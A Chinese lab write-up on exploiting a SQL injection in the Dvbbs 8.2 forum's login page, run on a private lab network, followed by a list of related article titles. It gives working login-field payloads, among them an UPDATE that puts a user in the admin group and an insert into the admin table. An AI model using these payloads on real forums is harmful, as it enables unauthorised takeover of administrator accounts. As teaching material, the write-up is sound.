动网论坛8.2经典注入漏洞利用
一、实验目的
理解动网论坛8.2原理
二、实验原理
动网论坛用户登录过程中,过滤不严,导致注入,提升权限。漏洞存在源文件的login.asp中。
三、实验环境
本机:192.168.1.2
目标机:192.168.1.3
四、 实验步骤
一、正常注册登录
1、访问地址:http://192.168.1.3:8010/,如图示:
2、首先注册一个用户:san 密码:123456,如图:
二、漏洞测试与利用
1、退出san ,打开登录界面:
2、使用以下语句登录:san’ and ‘a’=’ a 密码:123456
3、使用以下语句再次登录:san’ and ‘a’=’ b 密码:123456
4、提示用户不存在,说明以上语句起作用了,用户名处输入:
,;update dv_user set usergroupid=1 where username='san'--
5、提示用户名不存在,我们再次使用正确用户名和密码san 123456登录。在控制面板-我能做什么中,点击后,显示已是管理员组用户。
6、san用户为管理员身份,退出,我们再次使用以下语句登录,密码为正确密码(此处步骤重要):
san’;insert into dv_admin
7、打开管理员界面http://192.168.1.3:8010/admin
使用用户名:admin 密码:123456成功登陆
8、登陆后发现已是管理员身份,如图:
动网论坛8.2经典注入漏洞利用相关推荐
- 不为人知的动网7.1 SQL版注入漏洞
文章难易度:★★★ 文章阅读点:动网7.1 SQL版最新注入漏洞的详细利用以及如何在后台获取Webshell 话说上期X档案刊登了动网8.0 SQL版最新注入漏洞的文章,不知大家都掌握了没有,令人兴奋 ...
- 动网8.2版本的注入漏洞的利用
[实验原理] 动网8.2在用户登录时,过滤不严,可以导致注入,提升权限.漏洞存在源程序的login.asp文件. [实验步骤] 一.正常注册登录 1.1访问地址:http://192.168.1.3: ...
- 动网 php v1.0 漏洞,动网论坛dispuser.php页面SQL注入漏洞
受影响系统: 动网论坛 Dvbbs php 2.0++ 描述: DVBBS是一款Aspsky.Net开发和维护的开放源码ASP Web论坛程序. 在DVBBS的dispuser.php文件中: if( ...
- 利用动网论坛dvBBS漏洞上传webshell
动网论坛一直是国内比较受欢迎的ASP论坛程序 前提是知道数据库地址,并且可下载,一般数据库默认地址为/data/dvbbs8.mdb 1.通过注入点获得网站的后台账号和密码,但没有找到后台登录地址 2 ...
- 安全至上---ASP“动网论坛”漏洞分析
动网论坛作为国内一个优秀的asp论坛,深受广大站长和网友们的喜爱,但既然是程 序代码,就不可能是十全十美,今天在这里,我就要说一下它近期比较流行的两个漏洞 (好耶!快说快说,说完了我就去找常删我帖的论 ...
- 动网php_动网论坛PHP增强版(动网论坛PHP2.0++官方下载)V2.0官方版下载 - 下载吧...
开拓的力量,前进的方向,经历了一个冬的孕育,动网PHP2.0++正式版在我们团队的精心培养下,顺利与大家见面了.动网论坛PHP增强版此次正式版,一如既往的延续了PHP2.0++的创新功能,在新功能的基 ...
- 动网论坛缓存技术研究
动网论坛算是国内比较著名的一款论坛.从DVBBS7.0版本开始,动网重构了代码核心,采用缓存机制,程序和模板完全分离,在代码质量,权限等级,用户体验方面算是一个里程碑的作品了.虽然从7.0到现在的8. ...
- 动网论坛7.0获得WebShell的分析
本文作者:angel 文章性质:原创 发布日期:2004-06-27 发现:Super·Hei 分析:angel 环境/讨论:xiaolu 起哄:knife 前言 Super·Hei和我提起& ...
- html缩小网页时版块乱跑,解决动网论坛最后发表显示代码的问题(或导致首页排版错乱)...
动网论坛作为一个优秀的ASP论坛程序,两年前曾是千千万万站长的选择.虽然动网论坛官方停止了更新,但是由于我一个站用的是动网论坛,转换的话闲麻烦,而且之前做了不少个性化修改,再者我用着感觉也挺快的,也能 ...
最新文章
- python代码实例sicket_Python socket聊天脚本代码实例
- ndarray对象的建立
- RF工具ride使用
- Eclipse反编译插件(免费无需下载资源)
- Lattice Diamond在线调试Reveal Analyzer使用教程
- 阿铭Linux_网站维护学习笔记20190415
- word排版的时候如何将论文表格逆时针旋转90度竖放
- C# 从零开始编写一个修改“植物大战僵尸”阳光的内存辅助
- html图形渐变颜色一半一半,CSS3第八课:重复线性渐变repeating-linear-gradient
- CVPR 2022 Self-augmented Unpaired Image Dehazing via Density and Depth Decomposition个人学习笔记
- BP神经网络的MATLAB源码
- 小程序直接跳转公众号的必要条件记录
- Sun JVM,JRocket,J9,Harmony, 四种主要的Java虚拟机实现
- Linux中的rm指令
- TCP套接口的sk_backlog接收队列
- to_date的用法
- matlab亥姆霍兹线圈叠加原理,亥姆霍兹线圈仿真剖析.docx
- Spring全家桶-Spring Security之自定义数据库表认证和鉴权
- mipsel上移植花生壳域名服务
- java 响铃_怎么样编写一个java响铃程序?
热门文章
- 基于C++的Huffman赫夫曼编译码器开发 课程论文+项目源码及可执行exe文件
- Java实现QQ窗口自动输入
- 基于珠宝行业的RFID资产管理解决方案-新导智能
- @staticmethod静态方法
- DICOM:fo-dicom、dcm4che14、dcm4chee等开源库持续自我维护
- Windows10安装Docker详细步骤
- bbox regresion
- jsp servlet mysql项目_JSP+Servlet+JDBC+mysql实现的个人日记本系统
- 北京ADSL修改密码的网址
- 支付宝、微信注册时间,轻松查看!